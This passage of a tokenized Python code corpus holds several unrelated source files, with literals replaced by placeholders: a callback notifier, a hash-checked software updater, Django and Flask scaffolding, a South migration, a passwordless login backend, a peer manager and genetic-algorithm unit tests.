<EOL> self . shutdown = True <EOL> self . queue_lock . acquire ( ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_not_empty . set ( ) <EOL> self . queue_lock . release ( ) <EOL> if blocking : <EOL> self . thread . join ( ) <EOL> def status_notifier ( self , notification ) : <EOL> image = notification . sender <EOL> _type = type ( image ) . __name__ <EOL> typemap = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> if not _type in typemap : <EOL> raise Exception ( "<STR_LIT>" % _type ) <EOL> callback_body = { typemap [ _type ] : { '<STR_LIT>' : _type , <EOL> '<STR_LIT:id>' : image . identifier } } <EOL> for key in image . metadata ( ) : <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> callback_body [ typemap [ _type ] ] [ key ] = getattr ( image , key , None ) <EOL> self . _enqueue ( callback_body ) <EOL> def _enqueue ( self , status_update ) : <EOL> if self . shutdown : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . queue_lock . acquire ( ) <EOL> self . callback_queue . append ( status_update ) <EOL> self . queue_not_empty . set ( ) <EOL> self . queue_lock . release ( ) <EOL> def _wait_for_callback ( self ) : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . queue_not_empty . wait ( ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> def _get_next_callback ( self ) : <EOL> self . queue_lock . acquire ( ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_lock . release ( ) <EOL> return None <EOL> next_callback = self . callback_queue . pop ( <NUM_LIT:0> ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_not_empty . clear ( ) <EOL> self . queue_lock . release ( ) <EOL> return next_callback <EOL> def _do_next_callback ( self ) : <EOL> self . _wait_for_callback ( ) <EOL> next_callback = self . _get_next_callback ( ) <EOL> if next_callback : <EOL> self . log . debug ( "<STR_LIT>" % ( str ( next_callback ) ) ) <EOL> if self . callback_url == "<STR_LIT>" : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> else : <EOL> self . log . debug ( "<STR_LIT>" % ( self . callback_url ) ) <EOL> try : <EOL> resp , content = self . httplib . request ( self . callback_url , <EOL> "<STR_LIT>" , body = json . dumps ( next_callback ) , <EOL> headers = self . headers ) <EOL> except Exception , e : <EOL> self . log . debug ( "<STR_LIT>" % ( str ( e ) ) ) <EOL> def __call__ ( self ) : <EOL> while True : <EOL> self . _do_next_callback ( ) <EOL> if self . shutdown and len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> break </s>
<s> """<STR_LIT>""" <EOL> from xmlloader import * <EOL> from xmldumper import * </s>
<s> import os <EOL> from os import path <EOL> import shutil <EOL> import tempfile <EOL> from combine import sha1 , Manifest , Package , File , URI , log <EOL> class Update : <EOL> def __init__ ( self , currentver , manifest = None , manifesturi = None ) : <EOL> """<STR_LIT>""" <EOL> if manifest is None : <EOL> if manifesturi is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> with URI ( manifesturi ) as uri : <EOL> manifest = Manifest . from_yaml ( uri . read ( ) ) <EOL> if currentver != manifest [ "<STR_LIT>" ] : <EOL> log . error ( "<STR_LIT>" . format ( <EOL> currentver , manifest [ "<STR_LIT>" ] ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . manifest = manifest <EOL> self . package = None <EOL> def apply ( self , installpath , backuppath = None ) : <EOL> """<STR_LIT>""" <EOL> self . installpath = installpath <EOL> manifest = self . manifest <EOL> if "<STR_LIT>" in manifest : <EOL> packageuri = URI ( manifest [ "<STR_LIT>" ] ) <EOL> packagename = path . basename ( packageuri [ "<STR_LIT:path>" ] ) <EOL> packagepath = path . join ( tempfile . gettempdir ( ) , packagename ) <EOL> packageformat = None <EOL> if "<STR_LIT>" in manifest : <EOL> packageformat = manifest [ "<STR_LIT>" ] <EOL> log . info ( "<STR_LIT>" . format ( packageuri . uri ) ) <EOL> packageuri . fetch ( packagepath ) <EOL> packageuri . close ( ) <EOL> if "<STR_LIT>" in manifest : <EOL> packagesha1 = sha1 ( packagepath ) <EOL> if not packagesha1 == manifest [ "<STR_LIT>" ] : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . package = Package ( packagepath , packageformat ) <EOL> if backuppath is None : <EOL> self . backuppath = tempfile . mkdtemp ( prefix = "<STR_LIT>" ) <EOL> else : <EOL> self . backuppath = backuppath <EOL> if not path . isdir ( self . backuppath ) : <EOL> log . debug ( "<STR_LIT>" . format ( self . backuppath ) ) <EOL> os . mkdir ( self . backuppath ) <EOL> try : <EOL> for info in manifest . actions : <EOL> self . _action ( info ) <EOL> except Exception as err : <EOL> log . exception ( "<STR_LIT>" ) <EOL> for root , dirs , files in os . walk ( self . backuppath ) : <EOL> relpath = path . relpath ( root , self . backuppath ) <EOL> if relpath == "<STR_LIT:.>" : <EOL> relpath = "<STR_LIT>" <EOL> for filename in files : <EOL> filepath = path . join ( relpath , filename ) <EOL> log . info ( "<STR_LIT>" % ( filepath ) ) <EOL> self . _restore ( filepath ) <EOL> log . info ( "<STR_LIT>" ) <EOL> raise <EOL> finally : <EOL> self . cleanup = False <EOL> shutil . rmtree ( self . backuppath , onerror = self . _onerror ) <EOL> self . package . close ( ) <EOL> os . remove ( packagepath ) <EOL> if self . cleanup : <EOL> return self . backuppath <EOL> def _onerror ( self , func , filepath , error ) : <EOL> self . cleanup = True <EOL> def _backup ( self , filename , move = True ) : <EOL> ipath = path . normpath ( path . join ( self . installpath , filename ) ) <EOL> bpath = path . normpath ( path . join ( self . backuppath , filename ) ) <EOL> if not path . isfile ( ipath ) : <EOL> return <EOL> bdir = path . dirname ( bpath ) <EOL> if not path . isdir ( bdir ) : <EOL> os . makedirs ( bdir ) <EOL> try : <EOL> if move : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . move ( ipath , bpath ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . copy ( ipath , bpath ) <EOL> except : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> def _restore ( self , filename ) : <EOL> ipath = path . normpath ( path . join ( self . installpath , filename ) ) <EOL> bpath = path . normpath ( path . join ( self . backuppath , filename ) ) <EOL> idir = path . dirname ( ipath ) <EOL> if not path . isdir ( idir ) : <EOL> os . makedirs ( idir ) <EOL> try : <EOL> if path . isfile ( ipath ) : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> os . remove ( ipath ) <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . move ( bpath , ipath ) <EOL> except : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> def _action ( self , info ) : <EOL> action = info [ "<STR_LIT:action>" ] <EOL> filename = info [ "<STR_LIT:filename>" ] <EOL> fullpath = path . join ( self . installpath , filename ) <EOL> if action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if not sha1 ( fullpath ) == hash : <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> self . _backup ( filename ) <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT:replace>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> self . _backup ( filename ) <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> self . _backup ( filename ) <EOL> elif action == "<STR_LIT>" : <EOL> log . warning ( "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( action ) ) </s>
<s> from os import path , environ <EOL> from os . path import abspath , dirname , join <EOL> import sys <EOL> example_dir = dirname ( abspath ( __file__ ) ) <EOL> emailauth_dir = dirname ( example_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , example_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , emailauth_dir ) <EOL> from django . core . management import execute_manager <EOL> try : <EOL> import settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> """<STR_LIT>""" </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from PROJECTMODULE import settings <EOL> from PROJECTMODULE . main import create_app <EOL> app = create_app ( settings ) </s>
<s> import os <EOL> import re <EOL> from setuptools import setup , find_packages <EOL> ROOT = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> VERSIONFILE = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> VSRE = r"""<STR_LIT>""" <EOL> def get_version ( ) : <EOL> verstrline = open ( VERSIONFILE , '<STR_LIT>' ) . read ( ) <EOL> mo = re . search ( VSRE , verstrline , re . M ) <EOL> if mo : <EOL> return mo . group ( <NUM_LIT:1> ) <EOL> else : <EOL> raise RuntimeError ( <EOL> '<STR_LIT>' . format ( VERSIONFILE ) ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = get_version ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( os . path . join ( ROOT , '<STR_LIT>' ) ) . read ( ) , <EOL> packages = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> from datetime import datetime , timedelta <EOL> from django . conf import settings <EOL> from django . contrib . auth . backends import ModelBackend <EOL> from django . core . exceptions import FieldError <EOL> from nopassword . models import LoginCode <EOL> from nopassword . utils import get_user_model <EOL> class NoPasswordBackend ( ModelBackend ) : <EOL> def authenticate ( self , code = None , ** credentials ) : <EOL> try : <EOL> user = get_user_model ( ) . objects . get ( ** credentials ) <EOL> if not self . verify_user ( user ) : <EOL> return None <EOL> if code is None : <EOL> return LoginCode . create_code_for_user ( user ) <EOL> else : <EOL> timeout = getattr ( settings , '<STR_LIT>' , <NUM_LIT> ) <EOL> timestamp = datetime . now ( ) - timedelta ( seconds = timeout ) <EOL> login_code = LoginCode . objects . get ( user = user , code = code , timestamp__gt = timestamp ) <EOL> user = login_code . user <EOL> user . code = login_code <EOL> login_code . delete ( ) <EOL> return user <EOL> except ( TypeError , get_user_model ( ) . DoesNotExist , LoginCode . DoesNotExist , FieldError ) : <EOL> return None <EOL> def send_login_code ( self , code , secure = False , host = None , ** kwargs ) : <EOL> raise NotImplementedError <EOL> def verify_user ( self , user ) : <EOL> return user . is_active </s>
<s> from servent import * <EOL> class PeerManager : <EOL> def __init__ ( self , argv , peergov ) : <EOL> self . datamanager = peergov . manager <EOL> self . peergov = peergov <EOL> if len ( argv ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> defaultport = self . peergov . port or <NUM_LIT> <EOL> self . servent = Servent ( self , defaultport ) <EOL> for peer in argv : <EOL> try : <EOL> hp = peer . split ( "<STR_LIT::>" ) <EOL> port = hp [ <NUM_LIT:1> : <NUM_LIT:2> ] and int ( hp [ <NUM_LIT:1> ] ) or defaultport <EOL> self . servent . connectTo ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:6> , '<STR_LIT>' , ( hp [ <NUM_LIT:0> ] , port ) ) ) <EOL> pass <EOL> except Exception , e : <EOL> print str ( e ) <EOL> def handleServentEvent ( self , event , peerid ) : <EOL> if event == EVT_PEER_PROTOCOL_VERIFIED : <EOL> self . servent . syncAuthorities ( peerid ) <EOL> elif event == EVT_PEER_AUTHORITIES_SYNCHRONIZED : <EOL> with self . datamanager . authorities_lock : <EOL> authorities = self . datamanager . authorities <EOL> if authorities : <EOL> for authfpr in authorities . keys ( ) : <EOL> authority = authorities [ authfpr ] <EOL> if authority . interesting : <EOL> self . servent . syncTopics ( peerid , authority ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> self . peergov . resetTree ( ) <EOL> elif event == EVT_PEER_TOPIC_SYNCHRONIZED : <EOL> self . peergov . resetTree ( ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import copy <EOL> from operator import attrgetter <EOL> from six import next <EOL> from pyeasyga import pyeasyga <EOL> class TestPyeasyga ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . seed_data = [ ( '<STR_LIT>' , <NUM_LIT:15> ) , ( '<STR_LIT>' , <NUM_LIT:10> ) , ( '<STR_LIT>' , <NUM_LIT:12> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:5> ) , ( '<STR_LIT>' , <NUM_LIT:8> ) ] <EOL> member_1 = pyeasyga . Chromosome ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> member_2 = pyeasyga . Chromosome ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> member_3 = pyeasyga . Chromosome ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> member_4 = pyeasyga . Chromosome ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . population = [ ] <EOL> self . population . append ( member_1 ) <EOL> self . population . append ( member_2 ) <EOL> self . population . append ( member_3 ) <EOL> self . population . append ( member_4 ) <EOL> self . ga = pyeasyga . GeneticAlgorithm ( self . seed_data ) <EOL> self . ga . population_size = <NUM_LIT:10> <EOL> self . ga . generations = <NUM_LIT:10> <EOL> self . ga . fitness_function = lambda member , data : sum ( <EOL> [ profit for ( selected , ( fruit , profit ) ) in <EOL> zip ( member , data ) if selected and <EOL> member . count ( <NUM_LIT:1> ) == <NUM_LIT:3> ] ) <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> def test_genetic_algorithm_initialisation_1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> ga_1 = pyeasyga . GeneticAlgorithm ( self . seed_data ) <EOL> assert ga_1 . population_size == <NUM_LIT:50> <EOL> assert ga_1 . generations == <NUM_LIT:100> <EOL> assert ga_1 . elitism is True <EOL> assert ga_1 . crossover_probability == <NUM_LIT> <EOL> assert ga_1 . mutation_probability == <NUM_LIT> <EOL> def test_genetic_algorithm_initialisation_2 ( self ) : <EOL> '''<STR_LIT>''' <EOL> ga_2 = pyeasyga . GeneticAlgorithm ( self . seed_data , <EOL> population_size = <NUM_LIT> , <EOL> generations = <NUM_LIT> , <EOL> crossover_probability = <NUM_LIT> , <EOL> mutation_probability = <NUM_LIT> ) <EOL> ga_2 . elitism = False <EOL> ga_2 . maximise_fitness = False <EOL> fruit , profit = ga_2 . seed_data [ <NUM_LIT:1> ] <EOL> assert len ( ga_2 . seed_data ) == <NUM_LIT:5> <EOL> assert ( fruit , profit ) == ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> assert ga_2 . population_size == <NUM_LIT> <EOL> assert ga_2 . generations == <NUM_LIT> <EOL> assert ga_2 . elitism is False <EOL> assert ga_2 . maximise_fitness is False <EOL> assert ga_2 . crossover_probability == <NUM_LIT> <EOL> assert ga_2 . mutation_probability == <NUM_LIT> <EOL> def test_chromosome_initialisation_1 ( self ) : <EOL> chromosome = pyeasyga . Chromosome ( [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> assert chromosome . genes == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> assert chromosome . fitness == <NUM_LIT:0> <EOL> assert str ( chromosome ) == "<STR_LIT>" <EOL> def test_chromosome_initialisation_2 ( self ) : <EOL> chromosome = pyeasyga . Chromosome ( [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] ) <EOL> chromosome . fitness = <NUM_LIT:20> <EOL> assert chromosome . genes == [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] <EOL> assert chromosome . fitness == <NUM_LIT:20> <EOL> assert str ( chromosome ) == "<STR_LIT>" <EOL> def test_fitness_function ( self ) : <EOL> func = self . ga . fitness_function <EOL> data = self . ga . seed_data <EOL> assert func ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] , data ) == <NUM_LIT> <EOL> assert func ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , data ) == <NUM_LIT> <EOL> assert func ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , data ) == <NUM_LIT:0> <EOL> assert func ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , data ) == <NUM_LIT:0> <EOL> def test_crossover_function ( self ) : <EOL> parent_1 = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> parent_2 = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> crossover = lambda x , y : ( ( x [ : <NUM_LIT:2> ] + y [ <NUM_LIT:2> : ] ) , ( y [ : <NUM_LIT:2> ] + x [ <NUM_LIT:2> : ] ) ) <EOL> self . ga . crossover_function = crossover <EOL> child_1 , child_2 = self . ga . crossover_function ( parent_1 , parent_2 ) <EOL> assert child_1 == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> assert child_2 == [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> def test_mutate_function ( self ) : <EOL> '''<STR_LIT>''' <EOL> individual = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> self . ga . mutate_function ( individual ) <EOL> res = [ x == y for ( x , y ) in zip ( individual , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) ] <EOL> assert individual != [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert res . count ( False ) == <NUM_LIT:1> <EOL> def test_selection_function_1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . current_generation = self . population <EOL> self . ga . calculate_population_fitness ( ) <EOL> self . ga . tournament_size = <NUM_LIT:4> <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> individual = self . ga . selection_function ( self . ga . current_generation ) <EOL> assert individual . genes == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert individual . fitness == <NUM_LIT> <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_selection_function_2 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . current_generation = self . population <EOL> self . ga . 